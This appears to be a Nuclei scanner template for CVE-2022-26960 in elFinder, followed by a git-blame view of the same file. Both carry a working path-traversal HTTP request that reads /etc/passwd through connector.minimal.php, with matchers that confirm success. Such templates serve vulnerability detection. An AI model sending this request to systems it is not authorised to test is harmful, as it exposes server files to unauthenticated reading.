nuclei-templates/cves/2022/CVE-2022-26960.yaml

id: CVE-2022-26960

info:
  name: elFinder <=2.1.60 - Local File Inclusion
  author: pikpikcu
  severity: critical
  description: |
    elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
    - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
    - https://www.synacktiv.com/publications.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2022-26960
    cwe-id: CWE-22
  metadata:
    verified: "true"
  tags: cve,cve2022,lfi,elfinder

requests:
  - raw:
      - |
        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/05
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`id: CVE-2022-26960`

			`info:`
Enhancement: cves/2022/CVE-2022-26960.yaml by mp 2022-07-05 17:21:14 +00:00			`name: elFinder <=2.1.60 - Local File Inclusion`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`author: pikpikcu`
Auto Generated CVE annotations [Mon Jul 4 12:56:40 UTC 2022] :robot: 2022-07-04 12:56:40 +00:00			`severity: critical`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`description: \|`
Enhancement: cves/2022/CVE-2022-26960.yaml by mp 2022-07-05 17:21:14 +00:00			`elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`reference:`
			`- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html`
Auto Generated CVE annotations [Mon Jul 4 12:56:40 UTC 2022] :robot: 2022-07-04 12:56:40 +00:00			`- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db`
			`- https://www.synacktiv.com/publications.html`
Enhancement: cves/2022/CVE-2022-26960.yaml by mp 2022-07-05 17:21:14 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-26960`
Auto Generated CVE annotations [Mon Jul 4 12:56:40 UTC 2022] :robot: 2022-07-04 12:56:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`
			`cvss-score: 9.1`
			`cve-id: CVE-2022-26960`
			`cwe-id: CWE-22`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00			`metadata:`
Auto Generated CVE annotations [Mon Jul 4 12:56:40 UTC 2022] :robot: 2022-07-04 12:56:40 +00:00			`verified: "true"`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`tags: cve,cve2022,lfi,elfinder`

			`requests:`
			`- raw:`
			`- \|`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00			`GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1`
Create CVE-2022-26960.yaml 2022-06-30 23:31:46 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`
Update CVE-2022-26960.yaml 2022-07-04 12:32:11 +00:00
			`- type: status`
			`status:`
			`- 200`
Enhancement: cves/2022/CVE-2022-26960.yaml by mp 2022-07-05 17:21:14 +00:00
			`# Enhanced by mp on 2022/07/05`